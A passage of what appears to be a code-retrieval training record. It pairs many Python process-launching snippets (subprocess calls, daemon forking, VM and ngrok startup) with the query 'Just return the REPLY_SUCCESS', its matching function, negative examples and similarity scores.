sys.exit(1)\n\n elif processor == 'baro_processor':\n if running_dict:\n if running_dict['baro_processor'] != 'Running' and running_dict['spark<spark_worker>'] == 'Running' and running_dict['spark<spark_master>'] == 'Running' and running_dict['zookeeper'] == 'Running' and running_dict['kafka'] == 'Running':\n try:\n cmd_line = self.cmd_start_baro_processor\n cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n print ('Barometer processor has been started')\n\t\t\tprint (cmd_line)\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if running_dict['baro_processor'] == 'Running':\n print('Barometer processor is running!! please trying to stop it before it starts.')\n return\n elif running_dict['spark<spark_worker>'] == 'Stopped' or running_dict['spark<spark_master>'] == 'Stopped':\n print('Please start spark first!! trying to use command \"start spark\"')\n return\n elif running_dict['zookeeper'] == 'Stopped':\n print('Please start zookeeper server first!! trying to use command \"start zookeeper\"')\n return\n elif running_dict['kafka'] == 'Stopped':\n print('Please start kafka server first!! trying to use command \"start kafka\"')\n return\n else:\n print('Please type correct command! You may use \"help start\" see more help')\n sys.exit(1)\n\n elif processor == 'gyro_processor':\n if running_dict:\n if running_dict['gyro_processor'] != 'Running' and running_dict['spark<spark_worker>'] == 'Running' and running_dict['spark<spark_master>'] == 'Running' and running_dict['zookeeper'] == 'Running' and running_dict['kafka'] == 'Running':\n try:\n cmd_line = self.cmd_start_gyro_processor\n cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n print ('Gyroscope processor has been started')\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if running_dict['gyro_processor'] == 'Running':\n print('Gyroscope processor is running!! please trying to stop it before it starts.')\n return\n elif running_dict['spark<spark_worker>'] == 'Stopped' or running_dict['spark<spark_master>'] == 'Stopped':\n print('Please start spark first!! trying to use command \"start spark\"')\n return\n elif running_dict['zookeeper'] == 'Stopped':\n print('Please start zookeeper server first!! trying to use command \"start zookeeper\"')\n return\n elif running_dict['kafka'] == 'Stopped':\n print('Please start kafka server first!! trying to use command \"start kafka\"')\n return\n else:\n print('Please type correct command! You may use \"help start\" see more help')\n sys.exit(1)\n\n elif processor == 'aggr_processor':\n if running_dict:\n if running_dict['aggr_processor'] != 'Running' and running_dict['spark<spark_worker>'] == 'Running' and running_dict['spark<spark_master>'] == 'Running' and running_dict['zookeeper'] == 'Running' and running_dict['kafka'] == 'Running':\n try:\n cmd_line = self.cmd_start_aggr_naiv\n cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n print ('Aggregator processor has been started')\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if running_dict['aggr_processor'] == 'Running':\n print('Aggregator processor is running!! please trying to stop it before it starts.')\n return\n elif running_dict['spark<spark_worker>'] == 'Stopped' or running_dict['spark<spark_master>'] == 'Stopped':\n print('Please start spark first!! trying to use command \"start spark\"')\n return\n elif running_dict['zookeeper'] == 'Stopped':\n print('Please start zookeeper server first!! trying to use command \"start zookeeper\"')\n return\n elif running_dict['kafka'] == 'Stopped':\n print('Please start kafka server first!! trying to use command \"start kafka\"')\n return\n else:\n print ('Please type correct command! You may use \"help start\" see more help')\n sys.exit(1)\n\n else:\n print ('Please type correct command! You may use \"help start\" see more help')", "def spawn(self):\n self._proc = subprocess.Popen(\n self._args, stdout=subprocess.PIPE, stderr=subprocess.PIPE\n )", "def fork(self):\n try:\n pid = os.fork()\n if pid > 0:\n sys.exit(0)\n except OSError as e:\n sys.stderr.write(\"Fork failed: %d (%s)\\n\" % (e.errno, e.strerror))\n sys.exit(1)", "def start(self):\n self.start_time = dt.datetime.now()\n self.call = ' '.join(sys.argv)\n self.commands = []", "def _start_scrapy_process(self):\n cmd = self._parse_task_and_get_cmd()\n self.process = Popen(cmd, shell=True, stdout=PIPE,\n stderr=PIPE, preexec_fn=os.setsid)\n if self.task_data.get('with_best_seller_ranking', False):\n logger.info('With best seller ranking')\n cmd = self._parse_task_and_get_cmd(True)\n self.process_bsr = Popen(cmd, shell=True, stdout=PIPE,\n stderr=PIPE, preexec_fn=os.setsid)\n else:\n logger.info('Skipping best seller')\n logger.info('Scrapy process started for task #%s',\n self.task_data.get('task_id', 0))", "def startApplication(self, application):\n process = service.IProcess(application)\n if not self.config['originalname']:\n launchWithName(process.processName)\n self.setupEnvironment(\n self.config['chroot'], self.config['rundir'],\n self.config['nodaemon'], self.config['umask'],\n self.config['pidfile'])\n\n service.IService(application).privilegedStartService()\n\n uid, gid = self.config['uid'], self.config['gid']\n if uid is None:\n uid = process.uid\n if gid is None:\n gid = process.gid\n if uid is not None and gid is None:\n gid = pwd.getpwuid(uid).pw_gid\n\n self.shedPrivileges(self.config['euid'], uid, gid)\n app.startApplication(application, not self.config['no_save'])", "def start( self ):\n pathCheck( self.command )\n cout = '/tmp/' + self.name + '.log'\n if self.cdir is not None:\n self.cmd( 'cd ' + self.cdir )\n self.cmd( self.command + ' ' + self.cargs % self.port +\n ' 1>' + cout + ' 2>' + cout + '&' )\n self.execed = False", "async def start(self, args, env, cwd, port_expected_count,\n forward_stdout):\n if self._state != JobState.NEW:\n raise JobInvalidStateError('job cannot be restarted')\n self._process = polled_process.PolledProcess(args, env)\n self._process.on_finished.append(self._process_finished)\n self._state = JobState.PENDING\n cwd = pathlib.PurePath(cwd or '')\n if cwd.is_absolute():\n raise ValueError('job working directory path must be relative')\n if port_expected_count:\n port_discovery = polled_process.ProcessPortDiscovery.EXTERNAL\n else:\n port_discovery = polled_process.ProcessPortDiscovery.NONE\n process_kwargs = dict(\n port_discovery=port_discovery,\n workdir=str(self.sandbox.joinpath(cwd)),\n port_expected_count=port_expected_count\n )\n try:\n if forward_stdout:\n await self._process.start(\n stdout=None, stderr=None,\n **process_kwargs\n )\n else:\n stdout_path = self.sandbox.joinpath(self.FILENAME_STDOUT)\n stderr_path = self.sandbox.joinpath(self.FILENAME_STDERR)\n with open(stdout_path, 'wb') as stdout:\n with open(stderr_path, 'wb') as stderr:\n await self._process.start(\n stdout=stdout, stderr=stderr,\n **process_kwargs\n )\n self._state = JobState.RUNNING\n except Exception:\n self._state = JobState.FINISHED\n raise", "def test_application_start():\n\n process = subprocess.Popen(['python', 'runserver.py'],\n stderr=subprocess.STDOUT,\n stdout=subprocess.PIPE)\n\n assert process.pid\n debug_logging = process.stdout.read(100)\n process.kill()\n assert 'Starting application' in debug_logging", "def launch(self):\n \n # Get local loggers from launchlogger decorator\n out_log = getattr(self, 'out_log', None)\n err_log = getattr(self, 'err_log', None)\n\n # Check the properties\n fu.check_properties(self, self.properties)\n\n if self.restart:\n output_file_list = [self.output_path]\n if fu.check_complete_files(output_file_list):\n fu.log('Restart is enabled, this step: %s will the skipped' % self.step, out_log, self.global_log)\n return 0\n\n # create command line instruction\n cmd = self.create_cmd(out_log, err_log)\n\n returncode = cmd_wrapper.CmdWrapper(cmd, out_log, err_log, self.global_log).launch()\n return returncode", "def _start(self):\n pass", "def _restartProcessNormal(self) -> None:\n\n if IS_WIN_SVC in sys.argv:\n reactor.callFromThread(reactor.stop)\n return\n\n python = sys.executable\n argv = list(sys.argv)\n\n def addExe(val):\n if not \"run_peek_\" in val:\n return val\n if isWindows and not val.lower().endswith(\".exe\"):\n return val + \".exe\"\n return val\n\n argv = map(addExe, argv)\n os.execl(python, python, *argv)", "def _start(self, host):\n pass", "def start_processing(self):", "def do_start(self, args) :\r\n if not self.wait2start:\r\n Thread(target=self.start_loop).start()\r\n self.wait2start = True\r\n else:\r\n self.__Logger.warn(\"Waiting for simulators to be ready. To force start, type \\\"forcestart\\\"\")", "def start_execution(self):\n self.send_message(\"control.start\",None)", "def _start_process(ngrok_path, config_path=None, auth_token=None, region=None):\n _ensure_path_ready(ngrok_path)\n\n start = [ngrok_path, \"start\", \"--none\", \"--log=stdout\"]\n if config_path:\n logger.info(\"Starting ngrok with config file: {}\".format(config_path))\n start.append(\"--config={}\".format(config_path))\n if auth_token:\n logger.info(\"Overriding default auth token\")\n start.append(\"--authtoken={}\".format(auth_token))\n if region:\n logger.info(\"Starting ngrok in region: {}\".format(region))\n start.append(\"--region={}\".format(region))\n\n process = subprocess.Popen(start, stdout=subprocess.PIPE, universal_newlines=True)\n atexit.register(_terminate_process, process)\n\n logger.info(\"ngrok process starting: {}\".format(process.pid))\n\n ngrok_process = NgrokProcess(ngrok_path, config_path, process)\n _current_processes[ngrok_path] = ngrok_process\n\n timeout = time.time() + 15\n while time.time() < timeout:\n line = process.stdout.readline()\n ngrok_process.log_boot_line(line.strip())\n\n if ngrok_process.healthy():\n logger.info(\"ngrok process has started: {}\".format(ngrok_process.api_url))\n break\n elif ngrok_process.startup_error is not None or \\\n ngrok_process.proc.poll() is not None:\n break\n\n if not ngrok_process.healthy():\n # If the process did not come up in a healthy state, clean up the state\n kill_process(ngrok_path)\n\n if ngrok_process.startup_error is not None:\n raise PyngrokNgrokError(\"The ngrok process errored on start.\", ngrok_process.startup_logs,\n ngrok_process.startup_error)\n else:\n raise PyngrokNgrokError(\"The ngrok process was unable to start.\", ngrok_process.startup_logs)\n\n return ngrok_process", "def _start(self, instance):\n try:\n # Attempt to start the VE.\n # NOTE: The VE will throw a warning that the hostname is invalid\n # if it isn't valid. This is logged in LOG.error and is not\n # an indication of failure.\n _, err = utils.execute('sudo', 'vzctl', 'start', instance['id'])\n if err:\n LOG.error(err)\n except ProcessExecutionError as err:\n LOG.error(err)\n raise exception.Error('Failed to start %d' % instance['id'])\n\n # Set instance state as RUNNING\n db.instance_set_state(context.get_admin_context(),\n instance['id'],\n power_state.RUNNING)\n return True", "def test_startProcess(self):\r\n self.pm.addProcess(\"foo\", [\"foo\"])\r\n self.pm.startProcess(\"foo\")\r\n self.assertIsInstance(self.pm.protocols[\"foo\"], LoggingProtocol)\r\n self.assertIn(\"foo\", self.pm.timeStarted.keys())", "def start_service(service_name):\n subprocess.run([SUPERVISOR_CMD, \"start\", service_name])", "def activateButtonClicked(self):\n print(\"trying to start process...\")\n subprocess.Popen(\"/usr/local/bin/g13d --config /usr/local/bin/defaults.bind\", shell=True)\n self.checkProcess()", "def start(self): # pragma: no cover\n # Start the HAL and Fake Driver\n if self.hal_cmd_line:\n self.logger.info(\"Start the hal main process...\")\n process_obj = self.start_process(self.hal_cmd_line)\n self.hal_process = {\n \"process\": process_obj,\n \"retries\": 0,\n }\n manager_debugability.debugability_process_monitor(self.hal_process)\n\n # wait a period for process start and init complete\n time.sleep(self.PROCESS_INIT_PERIOD)\n if self.fake_driver_cmd_line:\n self.logger.info(\"Start the fake driver process...\")\n process_obj = self.start_process(self.fake_driver_cmd_line)\n self.fake_driver_process = {\n \"process\": process_obj,\n \"retries\": 0,\n }\n manager_debugability.debugability_process_monitor(self.fake_driver_process)\n\n for agent_name in self.agent_dict:\n self.logger.info(\"start agent process {}...\".format(agent_name))\n popenObj = self.start_process(self.agent_dict[agent_name])\n self.agent_obj[agent_name] = {\n \"process\": popenObj,\n \"retries\": 0,\n }\n manager_debugability.debugability_process_monitor(self.agent_obj[agent_name])\n\n # wait a period for agent start and init complete\n alive_status = False\n for timeout in range(self.WAITING_FOR_AGENT_STARTUP_RETRY):\n alive_status = ProcessAgent.is_all_agent_started()\n if not alive_status:\n time.sleep(1)\n if not alive_status:\n self.logger.error('Not all agent startup normally, reboot the system.')\n SysTools.sys_failure_reboot(reason='Not all agent startup')\n SysTools.diagnostic_self_test_fail('Communication error', 'Not all agent startup', 'Severity level=error')\n\n # start the manager process\n self.logger.info(\"Start the manager process...\")\n process_obj = self.start_process(self.manager_cmd_line)\n self.manager_process = {\n \"process\": process_obj,\n \"retries\": 0,\n }\n manager_debugability.debugability_process_monitor(self.manager_process)\n\n # start the fault_manager process\n self.logger.info(\"Start the fault manager process...\")\n process_obj = self.start_process(self.fault_manager_cmd_line)\n self.manager_process = {\n \"process\": process_obj,\n \"retries\": 0,\n }\n manager_debugability.debugability_process_monitor(self.manager_process)\n\n if self.ptp_driver_cmd_line:\n self.logger.info(\"Start the ptp driver client process...\")\n process_obj = self.start_process(self.ptp_driver_cmd_line)\n self.ptp_driver_process = {\n \"process\": process_obj,\n \"retries\": 0,\n }\n manager_debugability.debugability_process_monitor(self.ptp_driver_process)\n\n if self.res_hal_cmd_line:\n self.logger.info(\"Start the resource hal client process...\")\n process_obj = self.start_process(self.res_hal_cmd_line)\n self.res_driver_process = {\n \"process\": process_obj,\n \"retries\": 0,\n }\n manager_debugability.debugability_process_monitor(self.res_driver_process)\n\n if self.ssd_driver_cmd_line:\n self.logger.info(\"Start the ssd driver client process...\")\n process_obj = self.start_process(self.ssd_driver_cmd_line)\n self.ssd_driver_process = {\n \"process\": process_obj,\n \"retries\": 0,\n }\n manager_debugability.debugability_process_monitor(self.ssd_driver_process)\n\n while True:\n time.sleep(5)\n # monitor the all process\n manager_debugability.debugability_traceback()\n\n # monitor the manager process, will not retry....\n if self.manager_process is not None and self.manager_process['process'] is None:\n self.logger.error(\n \"Manager process is not up, reboot the system.\")\n if self.simulator_flag:\n sys.exit(-1)\n else:\n SysTools.sys_failure_reboot(reason=\"Manager process is not up\")\n SysTools.diagnostic_self_test_fail('Processing error', 'Manager process is not up',\n 'Severity level=error')\n\n for agent in self.agent_obj:\n # check if agent instance create succeed, retry if failure\n if None is self.agent_obj[agent][\"process\"]:\n if self.agent_obj[agent][\"retries\"] < self.AGENT_RETRIES_MAX:\n self.logger.warn(\n 'Agent %s retries %d times', agent, self.agent_obj[agent][\"retries\"])\n self.agent_obj[agent][\"process\"] = self.start_process(self.agent_dict[agent_name])\n self.agent_obj[agent][\"retries\"] += 1\n self.logger.warn('Agent %s retries %d times', agent, self.agent_obj[agent][\"retries\"])\n manager_debugability.debugability_process_monitor(self.agent_obj[agent])\n continue\n else:\n # FixMe: reboot system or ?\n self.logger.error('Agent %s retries times exceed, will reboot...', agent)\n SysTools.sys_failure_reboot(reason=\"Agent {0} retries times exceed\".format(agent))\n SysTools.diagnostic_self_test_fail('Communication error',\n \"Agent {0} retries times exceed\".format(agent),\n 'Severity level=error')\n\n if self.check_process_status(self.agent_obj[agent][\"process\"]) != self.PROCESSSTATE_ALIVE:\n self.logger.error(\n '%s process is dead, reboot the system.', agent)\n # FixMe: reboot system or restart agent\n SysTools.sys_failure_reboot(reason=\"{0} process is dead\".format(agent))\n SysTools.diagnostic_self_test_fail('Processing error', \"{0} process is dead\".format(agent),\n 'Severity level=error')\n # check other critical processes\n if self.ptp_driver_cmd_line:\n if self.check_process_status(self.ptp_driver_process[\"process\"]) != self.PROCESSSTATE_ALIVE:\n self.logger.error(\"ptp hal driver process is dead\")\n SysTools.sys_failure_reboot(reason=\"ptp hal driver process is dead\")\n SysTools.diagnostic_self_test_fail('Processing error', \"ptp hal driver process is dead\",\n 'Severity level=error')", "def start_process(check_id, storage, processes):\n\n process = Process(target=perform_check, args=(check_id,\n storage[check_id]['command'],\n storage[check_id]['freq'],))\n\n # Set process name to \"Process+check_id\"\n process.name = 'Process{}'.format(check_id)\n process.start()\n\n # Add process to processes dict with key=pid and value=processname\n processes[process.pid] = process\n storage[check_id]['pid'] = process.pid", "def start_as_service(self):\n from ..program_manager import ProgramManager\n send_action(ProgramManager.NAME, 'start', self.name)", "def start(self) -> None:\n self.should_exit = False\n self._main_thread = threading.Thread(target=self._wrap_start, daemon=True)\n self._main_thread.start()", "def test_startService(self):\r\n self.pm.addProcess(\"foo\", [\"foo\"])\r\n # Schedule the process to start\r\n self.pm.startService()\r\n # advance the reactor to start the process\r\n self.reactor.advance(0)\r\n self.assertTrue(\"foo\" in self.pm.protocols)", "def start_launch(self, _, **kwargs):\n self._handle_lifecycle = False if self._rp.launch_id else True\n self._launch_id = self._rp.launch_id or self._rp.start_launch(\n name=self._cfg.launch_name,\n start_time=timestamp(),\n attributes=self._get_launch_attributes(),\n description=self._cfg.launch_description,\n rerun=self._cfg.rerun,\n rerun_of=self._cfg.rerun_of,\n **kwargs,\n )", "def _launchAgentProcess( self ):\n return subprocess.Popen( [ sys.executable, os.path.join( sys.path[0], 'agentProcess.py' ), str( _processPid ) ], stdin=subprocess.PIPE, stdout=subprocess.PIPE )", "async def start_program(self):\n program_payload = self._program[\"program\"]\n await self._send_program_message(program_payload)", "def start(self):\n self.parent.start(auto_terminate=False)\n self.started = True", "def start(self, hook_url=None):\n\n self.on_start()\n\n if hook_url:\n self.register(hook_url=hook_url)\n\n else:\n p = Process(target=self.run)\n p.daemon = True\n p.start()\n return p", "def start(self):\n\t\treturn Job(SDK.PrlVm_Start(self.handle)[0])", "def _spawn_simple_process(self, process_id, name, module, cls, config, proc_attr):\n process_instance = self._create_process_instance(process_id, name, module, cls, config, proc_attr)\n # Add publishers if any...\n publish_streams = get_safe(config, \"process.publish_streams\")\n pub_names = self._set_publisher_endpoints(process_instance, publish_streams)\n\n # cleanup method to delete process queue (@TODO: leaks a bit here - should use XOs)\n def cleanup(*args):\n for name in pub_names:\n p = getattr(process_instance, name)\n p.close()\n\n proc = self.proc_sup.spawn(name=process_instance.id,\n service=process_instance,\n listeners=[],\n proc_name=process_instance._proc_name,\n cleanup_method=cleanup)\n proc.proc._glname = \"ION Proc %s\" % process_instance._proc_name\n self.proc_sup.ensure_ready(proc, \"_spawn_simple_process for %s\" % process_instance.id)\n\n # map gproc to process_instance\n self._spawned_proc_to_process[proc.proc] = process_instance\n\n # set service's reference to process\n process_instance._process = proc\n\n self._process_init(process_instance)\n self._process_start(process_instance)\n\n return process_instance", "def start_game(self):\n env = os.environ.copy()\n hook_path = os.path.join('hook', 'libhook.so')\n game_path = os.path.join(env.get('HOME'), '.local', 'share', 'Steam',\n 'steamapps', 'common', 'Super Hexagon',\n 'SuperHexagon')\n\n env['LD_PRELOAD'] = os.path.abspath(hook_path)\n args = [\"bash\", game_path]\n\n self.controller.handle_keys([])\n\n self.frame_counter = 0\n self.dead_until = None\n\n self.game_process = subprocess.Popen(\n args,\n env=env,\n # stdout=subprocess.DEVNULL,\n )", "def start_ex(self, nStartMode = consts.PSM_VM_START, nReserved = 0):\n\t\treturn Job(SDK.PrlVm_StartEx(self.handle, nStartMode, nReserved)[0])", "def start(self):\n return self.setup.start", "def do_start(self, line):\n\n if not line:\n line = \"cortex\"\n\n # First, check that the name isn't already taken\n clients = self.registry.get_clients()\n if clients.has_key(line):\n print \"A server already exists with that name (%s)\" % line\n return False\n\n subprocess.Popen([\"python\", \"cortex.py\", line])\n # Wait for the system to init\n time.sleep(1)\n print \"Started server, connecting...\"\n return self.do_connect(line)", "def _spawn_immediate_process(self, process_id, name, module, cls, config, proc_attr):\n process_instance = self._create_process_instance(process_id, name, module, cls, config, proc_attr)\n self._process_init(process_instance)\n self._process_start(process_instance)\n return process_instance", "def start(self):\n self._task.start()", "def start(self):\n self._task.start()", "def launch_vm(self):\r\n self._print(\"Starting VM\")\r\n options = [self.vboxheadless,'-startvm',self.vm_name]\r\n options.extend(self.vboxheadless_start_options)\r\n self.popen = subprocess.Popen(options)\r\n# result = process.wait()\r\n result = \"(other thread)\"\r\n self._print(\"Started %s\" % result)", "def startCommand(self):\n commandLine = \"su - %s -c \\\"%s/startservers \\\" \" % (self.runAsUser, self.boHome)\n return self.submitCommand(commandLine)", "def launch(self):\n self._fork()\n self._lock()\n os.setegid(self._user[1])\n os.seteuid(self._user[0])\n self._loop = True\n signal.signal(signal.SIGTERM, self.__signalHandler)\n sys.stdout = self._output\n sys.stderr = self._error\n self._run()\n sys.stdout = self._stdout\n sys.stderr = self._stderr\n os.setegid(0)\n os.seteuid(0)\n self._unlock()", "def start(self):\n if self.process:\n return True\n if self.host:\n cmd = \"ssh -Y root@%s\" % self.host\n else:\n cmd = \"su -c\"\n cmd += \" 'echo _GO_ && larchin-0call'\"\n # Run the command as root with pexpect.\n # Return True if it succeeded, else False.\n p = pexpect.spawn(cmd, timeout=None)\n e = p.expect([\"_GO_.*\\n\", pexpect.TIMEOUT, \"Password:\"], 5)\n while e != 0:\n if e == 2:\n ok, pw = ui.textLineDialog(_(\"Please enter root password\"),\n \"larchin: root pw\", pw=True)\n if not ok:\n run_error( _(\"No root password, cancelling run\"))\n return False\n\n p.sendline(pw.strip())\n e = p.expect([\"_GO_.*\\n\", pexpect.TIMEOUT, pexpect.EOF], 5)\n else:\n run_error(_(\"Couldn't start larchin-0call\"))\n return False\n self.process = p\n p.setecho(False)\n\n # Start a thread to read input from 0call.\n command.simple_thread(self.read0call)\n # Perform initialization of the installation system\n ok, textlines = self.xlist(\"init\")\n if not ok:\n run_error(_(\"Couldn't initialize installation system:\\n\\n%s\")\n % \"\\n\".join(textlines))\n return ok", "def start(self):\n # it may break during task parsing, for example wrong server name or\n # unsupported characters in the name os spider\n try:\n start_time = datetime.datetime.utcnow()\n self.start_date = start_time\n self.task_data['start_time'] = \\\n time.mktime(self.start_date.timetuple())\n self._start_scrapy_process()\n # self._push_simmetrica_events()\n first_signal = self._get_next_signal(start_time)\n except Exception as ex:\n logger.warning('Error occurred while starting scrapy: %s', ex)\n return False\n try:\n self._run_signal(first_signal, start_time)\n return True\n except FlowError as ex:\n self._signal_failed(first_signal, datetime.datetime.utcnow(), ex)\n self._finish()\n return False", "def start(self) -> None:\r\n self._spawn_ffmpeg()", "def setUp(self):\n self.p = Process(target = start_server)\n self.p.start()\n time.sleep(0.5)", "def start(self):\n\n self._task.start()", "def start_server_proc(event, server_cmd, checking_env):\n proc = subprocess.Popen(server_cmd, env=checking_env)\n\n # Blocking termination until event is set.\n event.wait()\n\n # If proc is still running, stop it.\n if proc.poll() is None:\n proc.terminate()", "def startapp():", "def start(self):\n raise NotImplementedError", "def start(self):\n raise NotImplementedError", "def start(self):\n raise NotImplementedError", "def start(self):\n \n rpc = self.smartstarter.rpcsystem\n \n process = yield self.smartstarter.start()\n \n try:\n \n make_worker_url = yield process.get_function_url(make_worker)\n make_worker_stub = rpc.create_function_stub(make_worker_url)\n \n worker = yield make_worker_stub(\"local\") # TODO remove network\n \n worker.get_function_url = process.get_function_url_stub\n \n worker.reset = rpc.create_local_function_stub(process.reset)\n worker.stop = rpc.create_local_function_stub(process.stop)\n worker.kill = rpc.create_local_function_stub(process.kill)\n worker.stdout = process.stdout.make_stub(rpc)\n worker.stderr = process.stderr.make_stub(rpc)\n worker.exited = process.exited.make_stub(rpc)\n\n except:\n process.kill()\n raise \n \n\n \n # worker.stdout.add_callback(stdout)\n # worker.stderr.add_callback(stderr)\n \n# receiver_stub = rpc.create_local_function_stub(hook.receiver)\n# hookinstall_url = yield process.get_function_url(hook.install_hook)\n# hookinstall_url_stub = rpc.create_function_stub(hookinstall_url)\n# yield hookinstall_url_stub(receiver_stub)\n \n defer.returnValue(worker)", "def platform_start(self):\n self.platform.start()", "def start(self):\n with self._lock:\n if not self.started():\n self._started = None\n getattr(self.factory, 'start_' + self.class_name())(self)", "def launch_new_process(self, config_settings, create_status_output_file):\n # Clear temp folder since a new Core process is to be launched\n self.ext_env_handler.delete_temp_folder_contents()\n\n # create Status file\n if create_status_output_file:\n self.ext_output_status_handler.write_status_file(config_settings.__getattribute__(self.config_public_settings.operation), self.seq_no, status=self.status.Transitioning.lower())\n else:\n self.ext_output_status_handler.update_file(self.seq_no)\n # launch core code in a process and exit extension handler\n process = self.process_handler.start_daemon(self.seq_no, config_settings, self.ext_env_handler)\n self.logger.log(\"exiting extension handler\")\n exit(Constants.ExitCode.Okay)", "def start(self) -> None:\n start_thread(super().start, self.__class__.__name__)", "async def start(self, regs=None):\n if regs is None:\n regs = reversed(self._regs)\n cmd = \"start{}\".format(self._fmt_regs(regs))\n assert len(cmd) == 5 + 6*8\n self.do(cmd)\n ret = (await self.read(4)).strip()\n if ret != \"ok\":\n raise ValueError(\"start failed\", ret)", "async def start(self, raise_on_fail: bool = False) -> None:\n try:\n await self._rpc.start()\n except InvalidPipe:\n if raise_on_fail:\n raise\n self._rpc = None" ]
[ "0.79140174", "0.7580194", "0.73277956", "0.7258669", "0.724767", "0.7187015", "0.7183471", "0.7030207", "0.7023982", "0.70187926", "0.7007485", "0.69129544", "0.6842755", "0.6826997", "0.68093807", "0.672955", "0.66865253", "0.6634776", "0.6593981", "0.6587125", "0.6586577", "0.6566555", "0.65434563", "0.6532303", "0.6530813", "0.6530813", "0.6530813", "0.6530813", "0.64971465", "0.64875907", "0.6440239", "0.64250714", "0.6404629", "0.64012635", "0.63938284", "0.63902014", "0.63844526", "0.63541657", "0.63458914", "0.6333013", "0.6283198", "0.62788904", "0.62701374", "0.6265256", "0.6257093", "0.62417495", "0.6239104", "0.6235003", "0.6209381", "0.6200457", "0.61788493", "0.6177837", "0.61743265", "0.6174005", "0.61727715", "0.6172638", "0.6163399", "0.6155497", "0.61522657", "0.61307806", "0.6098381", "0.60887665", "0.6085919", "0.6084334", "0.6076052", "0.6073166", "0.60664475", "0.606438", "0.60539", "0.60481966", "0.6046054", "0.60364336", "0.6035961", "0.60321194", "0.6027947", "0.60234696", "0.60172117", "0.60167056", "0.6012208", "0.6008841", "0.6008841", "0.6006892", "0.6002102", "0.59914756", "0.5981114", "0.5979771", "0.59789133", "0.5977467", "0.59683484", "0.5962684", "0.5960916", "0.59545517", "0.59545517", "0.59545517", "0.59484005", "0.59475464", "0.59446895", "0.5939435", "0.5937645", "0.5936961", "0.5932876" ]
0.0
-1
Just return the REPLY_SUCCESS
def _sendStart_result (self, (code, data)) : assert code == "REPLY_SUCCESS" return code
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _tunnel_success(tunnel_returncode):\n return tunnel_returncode < 0", "def execute_success(self, *args, **kwargs):\n return 0, self.shell_output, None", "def action_success(self, resp):\n return resp[0] in SUCCESS_CODES", "def action_success(self, resp):\n return resp[0] in SUCCESS_CODES", "def successful(self) -> bool:\n pass", "def successful(self):\n return (self.power_ack & self.datarate_ack & self.channelmask_ack) == 1", "def get_success_flag(self):\n return True", "def success(self, result):\r\n raise NotImplementedError", "def success(self):\n self.succeeded = True", "def process(self):\n # return ProcessorResult(True, _('OK'))\n return (True, _(\"OK\"))", "def IsOk(self):\r\n \r\n return True", "def success(self, appstruct):\n \n return None", "def succeed(self,args):\n code, msg, val = args\n if code != 1:\n raise ROSParamException(msg)\n return val", "def success(self, msg):\n print \"comm succeded\"\n return msg", "def is_success(msg):\n return msg['status'] == 'success'", "def result(self, state, action):\n print \"Ashish\"\n return 1", "def return_(x):\n return Pass(x)", "def success(cls, retval, retvalname='value'):\r\n if isinstance(retval, dict) and retvalname is None:\r\n retval[\"__result__\"] = \"success\" # TODO: right here just modified input dict. That's not good\r\n else:\r\n retval = {\"__result__\": \"success\", retvalname: retval}\r\n return PlatformMessage(method=\"__reply__\", kwargs=retval)", "def response(self, context, message):\r\n return True", "def ok(self):\n return self.res.ok and not self.rejected", "def success(self, target):\n self.passed += 1", "def success(self):\n return self.status == 0 and self.stdout", "def execute_failure(self, *args, **kwargs):\n return 1, \"\", None", "def success(cls, description: str = None) -> MatchResult:\n return cls(True, description)", "def is_success(self):\n return self.type_id == STATE_SUCCESS", "def success_p(self, input_meaning_p = None):\r\n return self.sys().success_p(input_meaning_p)", "def succeeded(self):\n output = self.__call__()\n if output.succeeded:\n return output or True\n return False", "def task_success(self, ref2goal=True):\n book_sess = self.match_rate(ref2goal)\n inform_sess = self.inform_F1(ref2goal)\n # book rate == 1 & inform recall == 1\n if (book_sess == 1 and inform_sess[1] == 1) \\\n or (book_sess == 1 and inform_sess[1] is None) \\\n or (book_sess is None and inform_sess[1] == 1):\n return 1\n else:\n return 0", "def _check_reply(self):\n self._more_packets_available = False\n try:\n if self._reply is None:\n self._status = (3, '{} without reply'.format(\n REPLAY_INFO[unpack_dint(self._message[:2])]))\n return False\n # Get the type of command\n typ = unpack_uint(self._reply[:2])\n\n # Encapsulation status check\n if unpack_dint(self._reply[8:12]) != SUCCESS:\n self._status = (3, \"{0} reply status:{1}\".format(\n REPLAY_INFO[typ],\n SERVICE_STATUS[unpack_dint(self._reply[8:12])]))\n return False\n\n # Command Specific Status check\n if typ == unpack_uint(ENCAPSULATION_COMMAND[\"send_rr_data\"]):\n status = unpack_usint(self._reply[42:43])\n if status != SUCCESS:\n status_msg = \"send_rr_data reply:{0} - Extend status:{1}\"\n self._status = (3, status_msg.format(\n SERVICE_STATUS[status],\n get_extended_status(self._reply, 42)))\n return False\n else:\n return True\n return True\n except Exception as e:\n raise DataError(e)", "def succeeded(self):\n return self.current_reward == 300", "def is_success(exit_code):\n return exit_code in [0, 5]", "def indicate_success(self):\n pass", "def result_success(result):\n\n if 200 <= result < 300:\n return True\n\n return False", "def send_command_success(self, sn: TransactionID, destination: tuple, source: tuple):\n pass", "def task_success(self, ref2goal=True):\n # for sit in list(turn_data['final_goal_state'].keys()):\n # if turn_data['final_goal_state'][sit] != {}:\n # for ssit in list(turn_data['final_goal_state'][sit].keys()):\n # if turn_data['final_goal_state'][sit][ssit] == '?':\n # return False\n # return True\n book_sess = self.match_rate(ref2goal)\n inform_sess = self.inform_F1(ref2goal)\n # book rate == 1 & inform recall == 1\n if (book_sess == 1 and inform_sess[1] == 1) \\\n or (book_sess == 1 and inform_sess[1] is None) \\\n or (book_sess is None and inform_sess[1] == 1):\n return 1\n else:\n return 0", "def respond(self):\n\n if not self.board.board:\n hand_data = HandEvaluator.evaluate_preflop_hand(self.hand)\n elif self.board:\n hand_data = HandEvaluator.evaluate_hand(self.board.cards + list(self.hand))\n if len(self.board.board) == 3:\n return Check()\n elif len(self.board.board) == 4:\n return Check()\n elif len(self.board.board) == 5:\n return Check()\n \n # always return Check() as last resort, because it beats Fold()\n return Check()", "def is_success(self):\n return 